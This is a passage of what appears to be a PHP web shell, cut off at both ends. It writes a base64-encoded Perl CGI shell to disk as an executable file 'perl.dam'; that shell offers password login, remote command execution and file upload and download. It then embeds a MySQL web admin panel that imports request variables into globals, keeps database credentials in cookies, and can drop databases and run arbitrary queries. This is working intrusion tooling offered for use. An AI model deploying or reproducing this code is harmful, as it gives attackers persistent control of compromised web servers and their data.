QkmUHJpbnRQYWdlRm9vdGVyOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIHJlYWRzIHRoZSBzcGVjaWZpZWQgZmlsZSBmcm9tIHRoZSBkaXNrIGFuZCBzZW5kcyBpdCB0byB0aGUNCiMgYnJvd3Nlciwgc28gdGhhdCBpdCBjYW4gYmUgZG93bmxvYWRlZCBieSB0aGUgdXNlci4NCiMgQXJndW1lbnQgMTogRnVsbHkgcXVhbGlmaWVkIHBhdGhuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIHNlbnQuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgU2VuZEZpbGVUb0Jyb3dzZXINCnsNCglsb2NhbCgkU2VuZEZpbGUpID0gQF87DQoJaWYob3BlbihTRU5ERklMRSwgJFNlbmRGaWxlKSkgIyBmaWxlIG9wZW5lZCBmb3IgcmVhZGluZw0KCXsNCgkJaWYoJFdpbk5UKQ0KCQl7DQoJCQliaW5tb2RlKFNFTkRGSUxFKTsNCgkJCWJpbm1vZGUoU1RET1VUKTsNCgkJfQ0KCQkkRmlsZVNpemUgPSAoc3RhdCgkU2VuZEZpbGUpKVs3XTsNCgkJKCRGaWxlbmFtZSA9ICRTZW5kRmlsZSkgPX4gIG0hKFteL15cXF0qKSQhOw0KCQlwcmludCAiQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXVua25vd25cbiI7DQoJCXByaW50ICJDb250ZW50LUxlbmd0aDogJEZpbGVTaXplXG4iOw0KCQlwcmludCAiQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9JDFcblxuIjsNCgkJcHJpbnQgd2hpbGUoPFNFTkRGSUxFPik7DQoJCWNsb3NlKFNFTkRGSUxFKTsNCgl9DQoJZWxzZSAjIGZhaWxlZCB0byBvcGVuIGZpbGUNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJcHJpbnQgIjxjb2RlPkZhaWxlZCB0byBkb3dubG9hZCAkU2VuZEZpbGU6ICQhPC9jb2RlPiI7DQoJCSZQcmludEZpbGVEb3dubG9hZEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJfQ0KfQ0KDQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciBkb3dubG9hZHMgYSBmaWxlLiBJdCBkaXNwbGF5cyBhIG1lc3NhZ2UNCiMgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluayB0aHJvdWdoIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLg0KIyBUaGlzIGZ1bmN0aW9uIGlzIGFsc28gY2FsbGVkIHdoZW4gdGhlIHVzZXIgY2xpY2tzIG9uIHRoYXQgbGluay4gSW4gdGhpcyBjYXNlLA0KIyB0aGUgZmlsZSBpcyByZWFkIGFuZCBzZW50IHRvIHRoZSBicm93c2VyLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIEJlZ2luRG93bmxvYWQNCnsNCgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkDQoJaWYoKCRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlxcfF4uOi8pKSB8DQoJCSghJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXC8vKSkpICMgcGF0aCBpcyBhYnNvbHV0ZQ0KCXsNCgkJJFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOw0KCX0NCgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQ0KCXsNCgkJY2hvcCgkVGFyZ2V0RmlsZSkgaWYoJFRhcmdldEZpbGUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsNCgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsNCgl9DQoNCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQ0KCXsNCgkJJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsNCgl9DQoJZWxzZSAjIHdlIGhhdmUgdG8gc2VuZCBvbmx5IHRoZSBsaW5rIHBhZ2UNCgl7DQoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIHdhbnRzIHRvIHVwbG9hZCBhIGZpbGUuIElmIHRoZQ0KIyBmaWxlIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGENCiMgZmlsZSwgb3RoZXJ3aXNlIGl0IHN0YXJ0cyB0aGUgdXBsb2FkIHByb2Nlc3MuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgVXBsb2FkRmlsZQ0Kew0KCSMgaWYgbm8gZmlsZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSB1cGxvYWQgZm9ybSBhZ2Fpbg0KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpDQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7DQoJCSZQcmludEZpbGVVcGxvYWRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCQlyZXR1cm47DQoJfQ0KCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCg0KCSMgc3RhcnQgdGhlIHVwbG9hZGluZyBwcm9jZXNzDQoJcHJpbnQgIjxjb2RlPlVwbG9hZGluZyAkVHJhbnNmZXJGaWxlIHRvICRDdXJyZW50RGlyLi4uPGJyPiI7DQoNCgkjIGdldCB0aGUgZnVsbGx5IHF1YWxpZmllZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBjcmVhdGVkDQoJY2hvcCgkVGFyZ2V0TmFtZSkgaWYgKCRUYXJnZXROYW1lID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87DQoJJFRyYW5zZmVyRmlsZSA9fiBtIShbXi9eXFxdKikkITsNCgkkVGFyZ2V0TmFtZSAuPSAkUGF0aFNlcC4kMTsNCg0KCSRUYXJnZXRGaWxlU2l6ZSA9IGxlbmd0aCgkaW57J2ZpbGVkYXRhJ30pOw0KCSMgaWYgdGhlIGZpbGUgZXhpc3RzIGFuZCB3ZSBhcmUgbm90IHN1cHBvc2VkIHRvIG92ZXJ3cml0ZSBpdA0KCWlmKC1lICRUYXJnZXROYW1lICYmICRPcHRpb25zIG5lICJvdmVyd3JpdGUiKQ0KCXsNCgkJcHJpbnQgIkZhaWxlZDogRGVzdGluYXRpb24gZmlsZSBhbHJlYWR5IGV4aXN0cy48YnI+IjsNCgl9DQoJZWxzZSAjIGZpbGUgaXMgbm90IHByZXNlbnQNCgl7DQoJCWlmKG9wZW4oVVBMT0FERklMRSwgIj4kVGFyZ2V0TmFtZSIpKQ0KCQl7DQoJCQliaW5tb2RlKFVQTE9BREZJTEUpIGlmICRXaW5OVDsNCgkJCXByaW50IFVQTE9BREZJTEUgJGlueydmaWxlZGF0YSd9Ow0KCQkJY2xvc2UoVVBMT0FERklMRSk7DQoJCQlwcmludCAiVHJhbnNmZXJlZCAkVGFyZ2V0RmlsZVNpemUgQnl0ZXMuPGJyPiI7DQoJCQlwcmludCAiRmlsZSBQYXRoOiAkVGFyZ2V0TmFtZTxicj4iOw0KCQl9DQoJCWVsc2UNCgkJew0KCQkJcHJpbnQgIkZhaWxlZDogJCE8YnI+IjsNCgkJfQ0KCX0NCglwcmludCAiPC9jb2RlPiI7DQoJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGVuYW1lIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGENCiMgZmlsZSwgb3RoZXJ3aXNlIGl0IGRpc3BsYXlzIGEgbWVzc2FnZSB0byB0aGUgdXNlciBhbmQgcHJvdmlkZXMgYSBsaW5rDQojIHRocm91Z2ggIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIERvd25sb2FkRmlsZQ0Kew0KCSMgaWYgbm8gZmlsZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSBkb3dubG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5zZmVyRmlsZSBlcSAiIikNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgkJcmV0dXJuOw0KCX0NCgkNCgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkDQoJaWYoKCRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlxcfF4uOi8pKSB8DQoJCSghJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXC8vKSkpICMgcGF0aCBpcyBhYnNvbHV0ZQ0KCXsNCgkJJFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOw0KCX0NCgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQ0KCXsNCgkJY2hvcCgkVGFyZ2V0RmlsZSkgaWYoJFRhcmdldEZpbGUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsNCgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsNCgl9DQoNCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQ0KCXsNCgkJJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsNCgl9DQoJZWxzZSAjIHdlIGhhdmUgdG8gc2VuZCBvbmx5IHRoZSBsaW5rIHBhZ2UNCgl7DQoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBNYWluIFByb2dyYW0gLSBFeGVjdXRpb24gU3RhcnRzIEhlcmUNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiZSZWFkUGFyc2U7DQomR2V0Q29va2llczsNCg0KJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NSSVBUX05BTUUnfTsNCiRTZXJ2ZXJOYW1lID0gJEVOVnsnU0VSVkVSX05BTUUnfTsNCiRMb2dpblBhc3N3b3JkID0gJGlueydwJ307DQokUnVuQ29tbWFuZCA9ICRpbnsnYyd9Ow0KJFRyYW5zZmVyRmlsZSA9ICRpbnsnZid9Ow0KJE9wdGlvbnMgPSAkaW57J28nfTsNCg0KJEFjdGlvbiA9ICRpbnsnYSd9Ow0KJEFjdGlvbiA9ICJsb2dpbiIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNpZmllZCwgdXNlIGRlZmF1bHQNCg0KIyBnZXQgdGhlIGRpcmVjdG9yeSBpbiB3aGljaCB0aGUgY29tbWFuZHMgd2lsbCBiZSBleGVjdXRlZA0KJEN1cnJlbnREaXIgPSAkaW57J2QnfTsNCmNob3AoJEN1cnJlbnREaXIgPSBgJENtZFB3ZGApIGlmKCRDdXJyZW50RGlyIGVxICIiKTsNCg0KJExvZ2dlZEluID0gJENvb2tpZXN7J1NBVkVEUFdEJ30gZXEgJFBhc3N3b3JkOw0KDQppZigkQWN0aW9uIGVxICJsb2dpbiIgfHwgISRMb2dnZWRJbikgIyB1c2VyIG5lZWRzL2hhcyB0byBsb2dpbg0Kew0KCSZQZXJmb3JtTG9naW47DQp9DQplbHNpZigkQWN0aW9uIGVxICJjb21tYW5kIikgIyB1c2VyIHdhbnRzIHRvIHJ1biBhIGNvbW1hbmQNCnsNCgkmRXhlY3V0ZUNvbW1hbmQ7DQp9DQplbHNpZigkQWN0aW9uIGVxICJ1cGxvYWQiKSAjIHVzZXIgd2FudHMgdG8gdXBsb2FkIGEgZmlsZQ0Kew0KCSZVcGxvYWRGaWxlOw0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAiZG93bmxvYWQiKSAjIHVzZXIgd2FudHMgdG8gZG93bmxvYWQgYSBmaWxlDQp7DQoJJkRvd25sb2FkRmlsZTsNCn0NCmVsc2lmKCRBY3Rpb24gZXEgImxvZ291dCIpICMgdXNlciB3YW50cyB0byBsb2dvdXQNCnsNCgkmUGVyZm9ybUxvZ291dDsNCn0K';$files = fopen("perl.dam" ,"w+");$write = fwrite ($files ,base64_decode($perlshell));fclose($files);chmod("perl.dam",0755);echo " ";}elseif ($action == 'mysql_1') {@chdir('damane');$crackftp = '<?
if ( function_exists('ini_get') ) {
	$onoff = ini_get('register_globals');
} else {
	$onoff = get_cfg_var('register_globals');
}
if ($onoff != 1) {
	@extract($HTTP_SERVER_VARS, EXTR_SKIP);
	@extract($HTTP_COOKIE_VARS, EXTR_SKIP);
	@extract($HTTP_POST_FILES, EXTR_SKIP);
	@extract($HTTP_POST_VARS, EXTR_SKIP);
	@extract($HTTP_GET_VARS, EXTR_SKIP);
	@extract($HTTP_ENV_VARS, EXTR_SKIP);
}

function logon() {
	global $PHP_SELF;
	setcookie( "mysql_web_admin_username" );
	setcookie( "mysql_web_admin_password" );
	setcookie( "mysql_web_admin_hostname" );
	echo "<table width=100% height=100%><tr><td><center>\n";
	echo "<table cellpadding=2><tr><td><center>\n";
	echo "<table cellpadding=20><tr><td><center>\n";
	echo "<h1>MySQL Interface (Developed By Mohajer22)</h1>\n";
	echo "<form action='$PHP_SELF'>\n";
	echo "<input type=hidden name=action value=bG9nb25fc3VibWl0>\n";
	echo "<table cellpadding=5 cellspacing=1>\n";
	echo "<tr><td>Hostname </td><td> <input type=text name=hostname value='localhost'></td></tr>\n";
	echo "<tr><td>Username </td><td> <input type=text name=username></td></tr>\n";
	echo "<tr><td>Password </td><td> <input type=password name=password></td></tr>\n";
	echo "</table><p>\n";
	echo "<input type=submit value='Enter'>\n";
	echo "<input type=reset value='Clear'><br>\n";
	echo "</form>\n";
	echo "</center></td></tr></table>\n";
	echo "</center></td></tr></table>\n";
	echo "<p><hr width=300>\n";
	echo "</center></td></tr></table>\n";
}

function logon_submit() {
	global $username, $password, $hostname ,$PHP_SELF;
	if($hostname =='')
		$hostname = 'localhost';
	setcookie( "mysql_web_admin_username", $username );
	setcookie( "mysql_web_admin_password", $password );
	setcookie( "mysql_web_admin_hostname", $hostname );
	echo "<META HTTP-EQUIV=Refresh CONTENT='0; URL=$PHP_SELF?action=bGlzdERCcw=='>";

}

function echoQueryResult() {
	global $queryStr, $errMsg;

	if( $errMsg == "" ) $errMsg = "Success";
	if( $queryStr != "" ) {
		echo "<table cellpadding=5>\n";
		echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
		echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
		echo "</table><p>\n";
	}
}

function listDatabases() {
	global $mysqlHandle, $PHP_SELF;

	echo "<h1>Databases List</h1>\n";

	echo "<form action='$PHP_SELF'>\n";
	echo "<input type=hidden name=action value=createDB>\n";
	echo "<input type=text name=dbname>\n";
	echo "<input type=submit value='Create Database'>\n";
	echo "</form>\n";
	echo "<hr>\n";

	echo "<table cellspacing=1 cellpadding=5>\n";

	$pDB = mysql_list_dbs( $mysqlHandle );
	$num = mysql_num_rows( $pDB );
	for( $i = 0; $i < $num; $i++ ) {
		$dbname = mysql_dbname( $pDB, $i );
		echo "<tr>\n";
		echo "<td>$dbname</td>\n";
		echo "<td><a href='$PHP_SELF?action=listTables&dbname=$dbname'>Tables</a></td>\n";
		echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a></td>\n";
		echo "<td><a href='$PHP_SELF?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
		echo "</tr>\n";
	}
	echo "</table>\n";
}

function createDatabase() {
	global $mysqlHandle, $dbname, $PHP_SELF;

	mysql_create_db( $dbname, $mysqlHandle );
	listDatabases();
}

function dropDatabase() {
	global $mysqlHandle, $dbname, $PHP_SELF;

	mysql_drop_db( $dbname, $mysqlHandle );
	listDatabases();
}

function listTables() {
	global $mysqlHandle, $dbname, $PHP_SELF;


	echo "<h1>Tables List</h1>\n";
	echo "<p class=location>$dbname</p>\n";
	echoQueryResult();
	echo "<form action='$PHP_SELF'>\n";
	echo "<input type=hidden name=action value=createTable>\n";
	echo "<input type=hidden name=dbname value=$dbname>\n";
	echo "<input type=text name=tablename>\n";
	echo "<input type=submit value='Create Table'>\n";
	echo "</form>\n";
	echo "<form action='$PHP_SELF'>\n";
	echo "<input type=hidden name=action value=query>\n";
	echo "<input type=hidden name=dbname value=$dbname>\n";
	echo "<input type=text size=120 name=queryStr>\n";
	echo "<input type=submit value='Query'>\n";
	echo "</form>\n";
	echo "<hr>\n";

	$pTable = mysql_list_tables( $dbname );

	if( $pTable == 0 ) {
		$msg  = mysql_error();
		echo "<h3>Error : $msg</h3><p>\n";
		return;
	}
	$num = mysql_num_rows( $pTable );

	echo "<table cellspacing=1 cellpadding=5>\n";

	for( $i = 0; $i < $num; $i++ ) {
		$tablename = mysql_tablename( $pTable, $i );

		echo "<tr>\n";
		echo "<td>\n";
		echo "$tablename\n";
		echo "</td>\n";
		echo "<td>\n";
		echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
		echo "</td>\n";
		echo "<td>\n";
		echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename'>Data</a>\n";
		echo "</td>\n";
		echo "<td>\n";
		echo "<a href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Table \'$tablename\'?')\">Drop</a>\n";
		echo "</td>\n";
		echo "<td>\n";
		echo "<a href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Dump Table \'$tablename\'?')\">Dump</a>\n";
		echo "</td>\n";
		echo "</tr>\n";
	}

	echo "</table>";
}

function createTable() {
	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;

	$queryStr = "CREATE TABLE $tablename ( no INT )";
	mysql_select_db( $dbname, $mysqlHandle );
	mysql_query( $queryStr, $mysqlHandle );
	$errMsg = mysql_error();

	listTables();
}

function dropTable() {
	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;

	$queryStr = "DROP TABLE $tablename";
	mysql_select_db( $dbname, $mysqlHandle );
	mysql_query( $queryStr, $mysqlHandle );
	$errMsg = mysql_error();

	listTables();
}

function viewSchema() {
	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;

	echo "<h1>Table Schema</h1>\n";
	echo "<p class=location>$dbname &gt; $tablename</p>\n";

	echoQueryResult();

	echo "<a href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add Field</a> | \n";
	echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename'>View Data</a>\n";
	echo "<hr>\n";

	$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
	$num = mysql_num_rows( $pResult );

	echo "<table cellspacing=1 cellpadding=5>\n";
	echo "<tr>\n";
	echo "<th>Field</th>\n";
	echo "<th>Type</th>\n";
	echo "<th>Null</th>\n";
	echo "<th>Key</th>\n";
	echo "<th>Default</th>\n";
	echo "<th>Extra</th>\n";
	echo "<th colspan=2>Action</th>\n";
	echo "</tr>\n";


	for( $i = 0; $i < $num; $i++ ) {
		$field = mysql_fetch_array( $pResult );
		echo "<tr>\n";
		echo "<td>".$field["Field"]."</td>\n";
		echo "<td>".$field["Type"]."</td>\n";
		echo "<td>".$field["Null"]."</td>\n";
		echo "<td>".$field["Key"]."</td>\n";
		echo "<td>".$field["Default"]."</td>\n";
		echo "<td>".$field["Extra"]."</td>\n";
		$fieldname = $field["Field"];
		echo "<td><a href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n";
		echo "<td><a href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n";
		echo "</tr>\n";
	}
	echo "</table>\n";

}

function manageField( $cmd ) {
	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF;

	if( $cmd == "add" )
		echo "<h1>Add Field</h1>\n";
	else if( $cmd == "edit" ) {
		echo "<h1>Edit Field</h1>\n";
		$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
		$num = mysql_num_rows( $pResult );
		for( $i = 0; $i < $num; $i++ ) {
			$field = mysql_fetch_array( $pResult );
			if( $field["Field"] == $fieldname ) {
				$fieldtype = $field["Type"];
				$fieldkey = $field["Key"];
				$fieldextra = $field["Extra"];
				$fieldnull = $field["Null"];
				$fielddefault = $field["Default"];
				break;
			}
		}
		$type = strtok( $fieldtype, " (,)\n" );
		if( strpos( $fieldtype, "(" ) ) {
			if( $type == "enum" | $type == "set" ) {
				$valuelist = strtok( " ()\n" );
			} else {
				$M = strtok( " (,)\n" );
				if( strpos( $fieldtype, "," ) )
					$D = strtok( " (,)\n" );
			}
		}
	}

	echo "<p class=location>$dbname &gt; $tablename</p>\n";
	echo "<form action=$PHP_SELF>\n";

	if( $cmd == "add" )
		echo "<input type=hidden name=action value=addField_submit>\n";
	else if( $cmd == "edit" ) {
		echo "<input type=hidden name=action value=editField_submit>\n";
		echo "<input type=hidden name=old_name value=$fieldname>\n";
	}
	echo "<input type=hidden name=dbname value=$dbname>\n";
	echo "<input type=hidden name=tablename value=$tablename>\n";

	echo "<h3>Name</h3>\n";
	echo "<input type=text name=name value=$fieldname><p>\n";
	echo '

<h3>Type</h3>

<font size=2>
* `M\' indicates the maximum display size.<br>
* `D\' applies to floating-point types and indicates the number of digits following the decimal point.<br>
</font>

<table>
<tr>
<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th>
</tr>
<tr>
<td><input type=radio name=type value="TINYINT" '; if( $type == "tinyint" ) echo "checked";echo '>TINYINT (-128 ~ 127)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="SMALLINT" '; if( $type == "smallint" ) echo "checked";echo '>SMALLINT (-32768 ~ 32767)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="MEDIUMINT" '; if( $type == "mediumint" ) echo "checked";echo '>MEDIUMINT (-8388608 ~ 8388607)</td>

<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="INT" '; if( $type == "int" ) echo "checked";echo '>INT (-2147483648 ~ 2147483647)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="BIGINT" '; if( $type == "bigint" ) echo "checked";echo '>BIGINT (-9223372036854775808 ~ 9223372036854775807)</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="FLOAT" '; if( $type == "float" ) echo "checked";echo '>FLOAT</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="DOUBLE" '; if( $type == "double" ) echo "checked";echo '>DOUBLE</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="DECIMAL" '; if( $type == "decimal" ) echo "checked";echo '>DECIMAL(NUMERIC)</td>
<td align=center>O</td>
<td align=center>O</td>
<td>&nbsp</td>
<td align=center>O</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="DATE" '; if( $type == "date" ) echo "checked";echo '>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="DATETIME" '; if( $type == "datetime" ) echo "checked";echo '>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 23:59:59, YYYY-MM-DD HH:MM:SS)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="TIMESTAMP" '; if( $type == "timestamp" ) echo "checked";echo '>TIMESTAMP (1970-01-01 00:00:00 ~ 2106..., YYYYMMDD[HH[MM[SS]]])</td>
<td align=center>O</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="TIME" '; if( $type == "time" ) echo "checked";echo '>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="YEAR" '; if( $type == "year" ) echo "checked";echo '>YEAR (1901 ~ 2155, 0000, YYYY)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="CHAR" '; if( $type == "char" ) echo "checked";echo '>CHAR</td>
<td align=center>O</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td align=center>O</td>
</tr>
<tr>
<td><input type=radio name=type value="VARCHAR" '; if( $type == "varchar" ) echo "checked";echo '>VARCHAR</td>
<td align=center>O</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td align=center>O</td>
</tr>
<tr>
<td><input type=radio name=type value="TINYTEXT" '; if( $type == "tinytext" ) echo "checked";echo '>TINYTEXT (0 ~ 255)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="TEXT" '; if( $type == "text" ) echo "checked";echo '>TEXT (0 ~ 65535)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="MEDIUMTEXT" '; if( $type == "mediumtext" ) echo "checked";echo '>MEDIUMTEXT (0 ~ 16777215)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="LONGTEXT" '; if( $type == "longtext" ) echo "checked";echo '>LONGTEXT (0 ~ 4294967295)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
